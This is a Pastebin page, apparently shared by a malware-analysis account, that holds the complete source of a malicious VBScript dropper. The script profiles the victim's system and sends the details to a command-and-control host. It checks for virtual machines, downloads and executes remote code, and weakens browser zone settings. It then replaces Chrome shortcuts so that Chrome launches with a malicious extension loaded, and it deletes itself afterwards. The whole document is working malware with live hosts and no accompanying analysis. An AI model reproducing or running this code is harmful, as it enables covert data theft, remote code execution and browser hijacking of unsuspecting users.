Advertisement
dissectmalware

Malicious VBScript

Dec 10th, 2018
749
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VBScript 17.25 KB | None | 0 0
  1. On Error Resume Next
  2.  
  3. variavel2numerox = "126"
  4.  
  5. set variavel1 = wScript.createObject("WScript.Shell")
  6.  
  7. variavel2 = variavel1.expandEnvironmentStrings("%USERPROFILE%")
  8.  
  9. DIM fso
  10.  
  11. Set fso = CreateObject("Scripting.FileSystemObject")
  12.  
  13. If (fso.FileExists(variavel2 & "\" & variavel2numerox & "x")) Then
  14.  
  15. discardScript()
  16.  
  17. WScript.Quit()
  18.  
  19. Else
  20.  
  21. Set objFSO=CreateObject("Scripting.FileSystemObject")
  22.  
  23. outFile=variavel2 & "\" & variavel2numerox & "x"
  24.  
  25. Set objFile = objFSO.CreateTextFile(outFile,True)
  26.  
  27. objFile.Write "closed" & vbCrLf
  28.  
  29. objFile.Close
  30.  
  31. xbits = "0"
  32.  
  33. Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
  34.  
  35. Set SystemSet = GetObject("winmgmts:").InstancesOf ("Win32_OperatingSystem")
  36.  
  37. for each System in SystemSet
  38.  
  39. variavel2a = System.Caption
  40.  
  41. variavel2b = System.OSLanguage
  42.  
  43. variavel2d = System.CSName
  44.  
  45. dtmConvertedDate.Value = System.InstallDate
  46.  
  47. dtmInstallDate = dtmConvertedDate.GetVarDate
  48.  
  49. variavel2e = dtmInstallDate
  50.  
  51. variavel2f = System.RegisteredUser
  52.  
  53. variavel2g = System.CountryCode
  54.  
  55. variavel2h = System.version
  56.  
  57. next
  58.  
  59. strComputer = "."
  60.  
  61. strComputer2 = "\"
  62.  
  63. strComputer3 = ":"
  64.  
  65. strfinal = "winmgmts"& strComputer3 & strComputer2 & strComputer2 & strComputer & strComputer2 &"root" & strComputer2 & "cimv2"
  66.  
  67. Set objWMIService =  GetObject(strfinal)
  68.  
  69. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_ComputerSystem")
  70.  
  71. For Each objComputer in colSettings
  72.  
  73. variavel2i2 = objComputer.Manufacturer
  74.  
  75. variavel2j2 = objComputer.Model
  76.  
  77. Next
  78.  
  79. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_Processor")
  80.  
  81. For Each objProcessor in colSettings
  82.  
  83. variavel2l2 = objProcessor.Description
  84.  
  85. Next
  86.  
  87. Function HTTPPost(sUrl, sRequest)
  88.  
  89. set oHTTP = CreateObject("Microsoft.XMLHTTP")
  90.  
  91. oHTTP.open "POST", sUrl,false
  92.  
  93. oHTTP.setRequestHeader "Content-Type", "application/x-www-form-urlencoded"
  94.  
  95. oHTTP.setRequestHeader "Content-Length", Len(sRequest)
  96.  
  97. oHTTP.send sRequest
  98.  
  99. HTTPPost = oHTTP.responseText
  100.  
  101. End Function
  102.  
  103. set variavel32x = wScript.createObject("WScript.Shell")
  104.  
  105. variavel32 = variavel32x.expandEnvironmentStrings("%programfiles%")
  106.  
  107. set variavel64x = wScript.createObject("WScript.Shell")
  108.  
  109. variavel64 = variavel32x.expandEnvironmentStrings("%programfiles(x86)%")
  110.  
  111. DIM fsoyx2
  112.  
  113. Set fsoyx2 = CreateObject("Scripting.FileSystemObject")
  114.  
  115. If (fsoyx2.FileExists(variavel32 & "\Google\Chrome\Application\chrome.exe")) Then
  116.  
  117. xbits =  variavel32 & "\Google\Chrome\Application\Chrome.exe, 0"
  118.  
  119. End If
  120.  
  121. If (fsoyx2.FileExists(variavel64 & "\Google\Chrome\Application\chrome.exe")) Then
  122.  
  123. xbits =  variavel64 & "\Google\Chrome\Application\Chrome.exe, 0"
  124.  
  125. End If
  126.  
  127. DIM fsoy
  128.  
  129. Set fsoy = CreateObject("Scripting.FileSystemObject")
  130.  
  131. If (fsoy.FolderExists("c:\Program Files (x86)")) Then
  132.  
  133. quantosbits = "64Bits"
  134.  
  135. Else
  136.  
  137. quantosbits = "32Bits"
  138.  
  139. End If
  140.  
  141. vartotal = variavel2i2 & "|" & variavel2j2 & "|" & variavel2l2
  142.  
  143. IF (variavel2g = "55") Then
  144.  
  145. sUrl = "http://dilaingil.info/kraus6.php?logins=0a"
  146.  
  147. sRequest = "host=" & variavel2d & "&status=[" & variavel2numerox & "]" & variavel2a & "(" & quantosbits & ")(" & variavel2b & ")(" & variavel2e & ")(" & variavel2f & ")(" & variavel2g & ")(" & variavel2h & ")" & vartotal  & "&globo=H74frxs&bk=-"
  148.  
  149. HTTPPost sUrl, sRequest
  150.  
  151. End If
  152.  
  153. IF (variavel2g = "55") and not   (xbits = "0")  Then
  154.  
  155. set objshell = createobject("wscript.shell")
  156.  
  157. runbat2 = variavel2 & "\b.bat"
  158.  
  159. Set objgrux=CreateObject("Scripting.FileSystemObject")
  160.  
  161. outFile= runbat2
  162.  
  163. Set objFile = objgrux.CreateTextFile(outFile,True)
  164.  
  165. objFile.Write "@echo off" & vbCrLf
  166.  
  167. objFile.Write "del /f /s /q ""%userprofile%\chrome""" & vbCrLf
  168.  
  169. objFile.Write "rd /s /q ""%userprofile%\chrome""" & vbCrLf
  170.  
  171. objFile.Write "rmdir /s /q ""%userprofile%\chrome""" & vbCrLf
  172.  
  173. objFile.Write "del /f ""%appdata%\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK""" & vbCrLf
  174.  
  175. objFile.Write "del /f ""%appdata%\Microsoft\Internet Explorer\Quick Launch\Google Chrome.LNK""" & vbCrLf
  176.  
  177. objFile.Write "del /f ""%userprofile%\Desktop\Google Chrome2.LNK""" & vbCrLf
  178.  
  179. objFile.Write "del /f ""%userprofile%\Desktop\Google Chrome.LNK""" & vbCrLf
  180.  
  181. objFile.Write "del /f ""C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome\Google Chrome.LNK""" & vbCrLf
  182.  
  183. objFile.Write "del /f ""C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome.LNK""" & vbCrLf
  184.  
  185. objFile.Write "del /f ""C:\Documents and Settings\All Users\Desktop\Google Chrome.LNK""" & vbCrLf
  186.  
  187. objFile.Write "del /f ""C:\Users\Public\Desktop\Google Chrome.LNK""" & vbCrLf
  188.  
  189. objFile.Write "del /f ""C:\Documents and Settings\All Users\Desktop\Google Chrome2.LNK""" & vbCrLf
  190.  
  191. objFile.Write "del /f ""%programdata%\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.LNK""" & vbCrLf
  192.  
  193. objFile.Write "del /f ""%programdata%\Microsoft\Windows\Start Menu\Programs\Google Chrome.LNK""" & vbCrLf
  194.  
  195. objFile.Write "del /f ""%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.vbs""" & vbCrLf
  196.  
  197. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  198.  
  199. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  200.  
  201. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  202.  
  203. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  204.  
  205. objFile.Write "REG ADD ""HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4"" /v 1407 /t REG_DWORD /d 0 /f" & vbCrLf
  206.  
  207. objFile.Write "del /f """ & runbat2 & """" & vbCrLf
  208.  
  209. objFile.Close
  210.  
  211. objshell.run "cmd.exe /C """ & runbat2 & """",vbhide
  212.  
  213. WScript.Sleep(20000)
  214.  
  215. set variavel1 = wScript.createObject("WScript.Shell")
  216.  
  217. variavel2 = variavel1.expandEnvironmentStrings("%USERPROFILE%")
  218.  
  219. sUrl = "http://dilaingil.info/kraus6.php?logins=did&s=Ch"
  220.  
  221. sRequest = "host=" & variavel2d & "&bk=-"
  222.  
  223. HTTPPost sUrl, sRequest
  224.  
  225. Dim su, source_str
  226.  
  227. source_str = "aeiou"
  228.  
  229. Dim variavel3, variavel16, variavel4, variavel5, variavel4b
  230.  
  231. variavel3 = variavel2
  232.  
  233. variavel6 =  ""
  234.  
  235. variavel6b =  StrReverse("-")
  236.  
  237. su = Mid(source_str, 2, 1)
  238.  
  239. variavel5 = variavel6  & "." & su & "x" & su
  240.  
  241. variavel4 = variavel3 & "\" & variavel5
  242.  
  243. variavel4 = variavel3 & "\" & StrReverse("piz.tgu")
  244.  
  245. variavel9 = variavel4
  246.  
  247. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  248.  
  249. dim variavel7,variavel8
  250.  
  251. dim variavel7b,variavel8b,variavel9b
  252.  
  253. su = Mid(source_str, 3, 1)
  254.  
  255. strComputer = "."
  256.  
  257. Set objWMIService = GetObject("winmgmts:\" & strComputer & "\root\cimv2")
  258.  
  259. Set colSettings = objWMIService.ExecQuery ("Select * from Win32_ComputerSystem")
  260.  
  261. For Each objComputer in colSettings
  262.  
  263. xxx1 = objComputer.Manufacturer
  264.  
  265. xxx2 = objComputer.Model
  266.  
  267. Next
  268.  
  269. Set colItems = objWMIService.ExecQuery("Select * from Win32_NetworkAdapterConfiguration",,48)
  270.  
  271. For Each objItem in colItems
  272.  
  273. xxx3 = xxx3 & objItem.Caption
  274.  
  275. xxx4 = "[" & variavel2numerox & "]" & objItem.Description
  276.  
  277. Next
  278.  
  279. sUrl1 = "http://dilaingil.info/krausx.php"
  280.  
  281. sRequest1 = "x=1p&info=" & xxx1 & " | " & xxx2 & "&an=" & xxx3 & xxx4
  282.  
  283. xxx5 = HTTPPost(sUrl1, sRequest1)
  284.  
  285. variavel8 = xxx5
  286.  
  287. If InStr(variavel8, "bit") > 0 Then
  288.  
  289. sUrl = "http://dilaingil.info/kraus6.php?logins=did&s=VM"
  290.  
  291. sRequest = "host=" & variavel2d & "&bk=-"
  292.  
  293. HTTPPost sUrl, sRequest
  294.  
  295. WScript.Quit()
  296.  
  297. End If
  298.  
  299. Dim max,min
  300.  
  301. max=10000
  302.  
  303. min=1
  304.  
  305. Randomize
  306.  
  307. Int((max-min+1)*Rnd+min)
  308.  
  309. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  310.  
  311. If variavel16.FileExists(variavel9) Then
  312.  
  313. variavel16.DeleteFile(variavel9)
  314.  
  315. End If
  316.  
  317. xsUrl = "http://pastebin.com/raw/kXaRaqSu"
  318.  
  319. xsRequest = ""
  320.  
  321. zzz = HTTPPost(xsUrl, xsRequest)
  322.  
  323. xxx = zzz
  324.  
  325. Sub Includex
  326.  
  327. ExecuteGlobal xxx
  328.  
  329. End Sub
  330.  
  331. Includex
  332.  
  333. MySub variavel8,variavel9
  334.  
  335. Set variavel12 = CreateObject("Scripting.FileSystemObject")
  336.  
  337. If variavel12.FileExists(variavel9) Then
  338.  
  339. sUrl = "http://dilaingil.info/kraus6.php?logins=did&s=B"
  340.  
  341. sRequest = "host=" & variavel2d & "&bk=-"
  342.  
  343. HTTPPost sUrl, sRequest
  344.  
  345. ZipFile = variavel9
  346.  
  347. ExtractTo = variavel2
  348.  
  349. Set fso = CreateObject("Scripting.FileSystemObject")
  350.  
  351. If NOT fso.FolderExists(ExtractTo) Then
  352.  
  353. fso.CreateFolder(ExtractTo)
  354.  
  355. End If
  356.  
  357. set objShell = CreateObject("Shell.Application")
  358.  
  359. set FilesInZip=objShell.NameSpace(ZipFile).items
  360.  
  361. objShell.NameSpace(ExtractTo).CopyHere(FilesInZip)
  362.  
  363. Set fso = Nothing
  364.  
  365. Set objShell = Nothing
  366.  
  367. End if
  368.  
  369. If variavel16.FileExists(variavel9) Then
  370.  
  371. Dim variavel15
  372.  
  373. If variavel16.FileExists(variavel2 & "\Chrome\1.9.6\6.js" ) Then
  374.  
  375. sUrl = "http://dilaingil.info/kraus6.php?logins=did&s=OK"
  376.  
  377. sRequest = "host=" & variavel2d  & "&bk=-"
  378.  
  379. HTTPPost sUrl, sRequest
  380.  
  381. End if
  382.  
  383. set gtx1 = wScript.createObject("WScript.Shell")
  384.  
  385. gtx2 = gtx1.expandEnvironmentStrings("%USERPROFILE%")
  386.  
  387. Dim pixixito1,pixixito2,pixixito3,pixixito4
  388.  
  389. Function RandomString( ByVal strLen )
  390.  
  391. Dim str, min, max
  392.  
  393. Const LETTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJLMNKYWOPQRSTUVXZ"
  394.  
  395. min = 1
  396.  
  397. max = Len(LETTERS)
  398.  
  399. Randomize
  400.  
  401. For i = 1 to strLen
  402.  
  403. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
  404.  
  405. Next
  406.  
  407. RandomString = str
  408.  
  409. End Function
  410.  
  411. Function Randominterger( ByVal strLen )
  412.  
  413. Dim str, min, max
  414.  
  415. Const LETTERS = "1234567890"
  416.  
  417. min = 1
  418.  
  419. max = Len(LETTERS)
  420.  
  421. Randomize
  422.  
  423. For i = 1 to strLen
  424.  
  425. str = str & Mid( LETTERS, Int((max-min+1)*Rnd+min), 1 )
  426.  
  427. Next
  428.  
  429. Randominterger = str
  430.  
  431. End Function
  432.  
  433. dim yttt
  434.  
  435. yttt = Randominterger(15)
  436.  
  437. Function trocaridc( ForReadingx)
  438.  
  439. const ForReading = 1
  440.  
  441. const ForWriting = 2
  442.  
  443. strFileName = gtx2 & "\Chrome\1.9.6\" & ForReadingx & ".js"
  444.  
  445. strOldText = "var id = ""-"";"
  446.  
  447. strNewText = "var id = """ & yttt & """;"
  448.  
  449. Set objgru = CreateObject("Scripting.FileSystemObject")
  450.  
  451. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  452.  
  453. strText = objFile.ReadAll
  454.  
  455. objFile.Close
  456.  
  457. strNewText = Replace(strText, strOldText, strNewText)
  458.  
  459. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  460.  
  461. objFile.WriteLine strNewText
  462.  
  463. objFile.Close
  464.  
  465. End Function
  466.  
  467. Function trocar( ForReadingx)
  468.  
  469. dim ttt
  470.  
  471. const ForReading = 1
  472.  
  473. const ForWriting = 2
  474.  
  475. strFileName = gtx2 & "\Chrome\1.9.6\manifest.json"
  476.  
  477. strOldText = ForReadingx
  478.  
  479. ttt = RandomString(6)
  480.  
  481. strNewText = ttt & ".js"
  482.  
  483. Dim gru
  484.  
  485. Set gru = WScript.CreateObject("Scripting.FileSystemObject")
  486.  
  487. gru.MoveFile gtx2 & "\Chrome\1.9.6\" & strOldText, gtx2 & "\Chrome\1.9.6\" & strNewText
  488.  
  489. Set objgru = CreateObject("Scripting.FileSystemObject")
  490.  
  491. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  492.  
  493. strText = objFile.ReadAll
  494.  
  495. objFile.Close
  496.  
  497. strNewText = Replace(strText, strOldText, strNewText)
  498.  
  499. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  500.  
  501. objFile.WriteLine strNewText
  502.  
  503. objFile.Close
  504.  
  505. End Function
  506.  
  507. Function trocarbmp( ForReadingx)
  508.  
  509. dim ttt
  510.  
  511. const ForReading = 1
  512.  
  513. const ForWriting = 2
  514.  
  515. strFileName = gtx2 & "\Chrome\1.9.6\manifest.json"
  516.  
  517. strOldText = ForReadingx
  518.  
  519. ttt = RandomString(10)
  520.  
  521. strNewText = ttt & ".bmp"
  522.  
  523. Dim gru
  524.  
  525. Set gru = WScript.CreateObject("Scripting.FileSystemObject")
  526.  
  527. gru.MoveFile gtx2 & "\Chrome\1.9.6\iconos\" & strOldText, gtx2 & "\Chrome\1.9.6\iconos\" & strNewText
  528.  
  529. Set objgru = CreateObject("Scripting.FileSystemObject")
  530.  
  531. Set objFile = objgru.OpenTextFile(strFileName, ForReading)
  532.  
  533. strText = objFile.ReadAll
  534.  
  535. objFile.Close
  536.  
  537. strNewText = Replace(strText, strOldText, strNewText)
  538.  
  539. Set objFile = objgru.OpenTextFile(strFileName, ForWriting)
  540.  
  541. objFile.WriteLine strNewText
  542.  
  543. objFile.Close
  544.  
  545. End Function
  546.  
  547. DIM grut
  548.  
  549. Set grut = CreateObject("Scripting.FileSystemObject")
  550.  
  551. If (grut.FileExists(gtx2 & "\Chrome\1.9.6\6.js")) Then
  552.  
  553. trocaridc("1")
  554.  
  555. trocaridc("2")
  556.  
  557. trocaridc("3")
  558.  
  559. trocar("1.js")
  560.  
  561. trocar("2.js")
  562.  
  563. trocar("3.js")
  564.  
  565. trocarbmp("1.bmp")
  566.  
  567. End If
  568.  
  569. pixixito1 = RandomString(5)
  570.  
  571. pixixito2 = RandomString(5)
  572.  
  573. pixixito3 = RandomString(5)
  574.  
  575. pixixito4 = RandomString(5)
  576.  
  577. runvbs = gtx2 & "\" & RandomString(5) & ".vbs"
  578.  
  579. runbat = gtx2 & "\" & RandomString(5) & ".bat"
  580.  
  581. set gtx1a = wScript.createObject("WScript.Shell")
  582.  
  583. gtappdata = gtx1a.expandEnvironmentStrings("%appdata%")
  584.  
  585. set gtx1b = wScript.createObject("WScript.Shell")
  586.  
  587. gtuserprofile = gtx1b.expandEnvironmentStrings("%userprofile%")
  588.  
  589. Set oWS = WScript.CreateObject("WScript.Shell")
  590.  
  591. sLinkFile = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.LNK"
  592.  
  593. Set oLink = oWS.CreateShortcut(sLinkFile)
  594.  
  595. oLink.TargetPath = """" & runvbs & """"
  596.  
  597. oLink.IconLocation = xbits
  598.  
  599. oLink.WorkingDirectory = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\"
  600.  
  601. oLink.Save
  602.  
  603. Set oWS = WScript.CreateObject("WScript.Shell")
  604.  
  605. sLinkFile = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\Google Chrome.LNK"
  606.  
  607. Set oLink = oWS.CreateShortcut(sLinkFile)
  608.  
  609. oLink.TargetPath = """" & runvbs & """"
  610.  
  611. oLink.IconLocation = xbits
  612.  
  613. oLink.WorkingDirectory = gtappdata & "\Microsoft\Internet Explorer\Quick Launch\"
  614.  
  615. oLink.Save
  616.  
  617. Set oWS = WScript.CreateObject("WScript.Shell")
  618.  
  619. sLinkFile = gtuserprofile & "\Desktop\Google Chrome.LNK"
  620.  
  621. Set oLink = oWS.CreateShortcut(sLinkFile)
  622.  
  623. oLink.TargetPath = """" & runvbs & """"
  624.  
  625. oLink.IconLocation = xbits
  626.  
  627. oLink.WorkingDirectory = gtuserprofile &  "\Desktop"
  628.  
  629. oLink.Save
  630.  
  631. Set oWS = WScript.CreateObject("WScript.Shell")
  632.  
  633. sLinkFile = "C:\Documents and Settings\All Users\Menu Iniciar\Programas\Google Chrome.LNK"
  634.  
  635. Set oLink = oWS.CreateShortcut(sLinkFile)
  636.  
  637. oLink.TargetPath = """" & runvbs & """"
  638.  
  639. oLink.IconLocation = xbits
  640.  
  641. oLink.WorkingDirectory = "C:\Documents and Settings\All Users\Menu Iniciar\Programas"
  642.  
  643. oLink.Save
  644.  
  645. Set oWS = WScript.CreateObject("WScript.Shell")
  646.  
  647. sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.LNK"
  648.  
  649. Set oLink = oWS.CreateShortcut(sLinkFile)
  650.  
  651. oLink.TargetPath = """" & runvbs & """"
  652.  
  653. oLink.IconLocation = xbits
  654.  
  655. oLink.WorkingDirectory = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\"
  656.  
  657. oLink.Save
  658.  
  659. Set oWS = WScript.CreateObject("WScript.Shell")
  660.  
  661. sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.LNK"
  662.  
  663. Set oLink = oWS.CreateShortcut(sLinkFile)
  664.  
  665. oLink.TargetPath = """" & runvbs & """"
  666.  
  667. oLink.IconLocation = xbits
  668.  
  669. oLink.WorkingDirectory = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\"
  670.  
  671. oLink.Save
  672.  
  673. Set objgrux=CreateObject("Scripting.FileSystemObject")
  674.  
  675. outFile= runvbs
  676.  
  677. Set objFile = objgrux.CreateTextFile(outFile,True)
  678.  
  679. objFile.Write "set objshell = createobject(""wscript.shell"")" & vbCrLf
  680.  
  681. objFile.Write "objshell.run ""cmd.exe /C """"" & runbat & """"""",vbhide" & vbCrLf
  682.  
  683. objFile.Close
  684.  
  685. Set objShell5 = WScript.CreateObject("WScript.Shell")
  686.  
  687. Cami2 = objShell5.ExpandEnvironmentStrings("%userprofile%")
  688.  
  689. bonde1kilo="Wind" & "ows\syste" & "m32"
  690.  
  691. segundafeira="userpr" & "ofile"
  692.  
  693. nossasvidas="prog" & "ramfi" & "les"
  694.  
  695. Set objgru=CreateObject("Scripting.FileSystemObject")
  696.  
  697. outFile= runbat
  698.  
  699. Set objFile = objgru.CreateTextFile(outFile,True)
  700.  
  701. objFile.Write "@echo off" & vbCrLf
  702.  
  703. objFile.Write "set " & pixixito1 & "=G" & "oo" & vbCrLf
  704.  
  705. objFile.Write "set " & pixixito2 & "=%" & pixixito1 & "%g" & "le" & vbCrLf
  706.  
  707. objFile.Write "set " & pixixito3 & "=c" & "hr" & vbCrLf
  708.  
  709. objFile.Write "set " & pixixito4 & "=%" & pixixito3 & "%om" & "e" & vbCrLf
  710.  
  711. objFile.Write "cd ""%" & segundafeira & "%""" & vbCrLf
  712.  
  713. objFile.Write "C:\" & bonde1kilo & "\rmdir /s /q ""%" & segundafeira & "%\ext""" & vbCrLf
  714.  
  715. objFile.Write "C:\" & bonde1kilo & "\mkdir ext" & vbCrLf
  716.  
  717. objFile.Write "set s=%random%" & vbCrLf
  718.  
  719. objFile.Write "set fs=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  720.  
  721. objFile.Write "C:\" & bonde1kilo & "\taskkill -f -im xcopy.exe" & vbCrLf
  722.  
  723. objFile.Write "C:\" & bonde1kilo & "\xcopy /I /S ""%" & segundafeira & "%\%" & pixixito4 & "%\1.9.6"" %fs%" & vbCrLf
  724.  
  725. objFile.Write "C:\" & bonde1kilo & "\taskkill -f -im %" & pixixito4 & "%.exe" & vbCrLf
  726.  
  727. objFile.Write "IF EXIST ""%" & nossasvidas & "(x86)%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.e" & "xe"" (" & vbCrLf
  728.  
  729. objFile.Write """%" & nossasvidas & "(x86)%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.exe"" --load-extension=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  730.  
  731. objFile.Write "ECHO ""x86""" & vbCrLf
  732.  
  733. objFile.Write ") ELSE (" & vbCrLf
  734.  
  735. objFile.Write """%" & nossasvidas & "%\%" & pixixito2 & "%\%" & pixixito4 & "%\Application\%" & pixixito4 & "%.exe"" --load-extension=""%" & segundafeira & "%\ext\%s%""" & vbCrLf
  736.  
  737. objFile.Write "ECHO ""NORMAL""" & vbCrLf
  738.  
  739. objFile.Write ")" & vbCrLf
  740.  
  741. objFile.Close
  742.  
  743. Set variavel16 = CreateObject("Scripting.FileSystemObject")
  744.  
  745. If variavel16.FileExists(variavel9) Then
  746.  
  747. variavel16.DeleteFile(variavel9)
  748.  
  749. End If
  750.  
  751. Set objShell = Nothing
  752.  
  753. Set objshell = createobject("wscript.shell")
  754.  
  755. objshell.run "cscript """ & runvbs & """",vbhide
  756.  
  757. End If
  758.  
  759. Set variavel15 = Nothing
  760.  
  761. End If
  762.  
  763. End If
  764.  
  765. Function discardScript()
  766.  
  767. Set objFSO = CreateObject("Scripting.FileSystemObject")
  768.  
  769. strScript = Wscript.ScriptFullName
  770.  
  771. objFSO.DeleteFile(strScript)
  772.  
  773. End Function
  774.  
  775. discardScript()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement